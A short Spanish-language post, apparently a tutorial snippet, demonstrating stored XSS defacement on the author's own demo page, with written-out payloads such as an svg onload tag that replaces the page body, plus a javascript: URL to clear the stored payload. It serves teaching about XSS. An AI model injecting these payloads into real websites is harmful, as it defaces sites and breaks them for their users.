Si hay xss, el deface es muy sencillo.
https://stringmanolo.ga/xssSeries/storedXSS.html<svg/onload=alert()>
Recargar
Borrar
<svg/onload=document.body.innerHTML=1337>
Como ves, la web queda totalmente inservible.
Para resetearla en chrome, escribe a mano en la url javascript:localStorage.payload="";
Das enter, recargas y listo.
Puedes meter cualquier cosa en la web.
Aquí más info:
https://foro.elhacker.net/nivel_web/security_series_xss_cross_site_scripting-t507362.0.html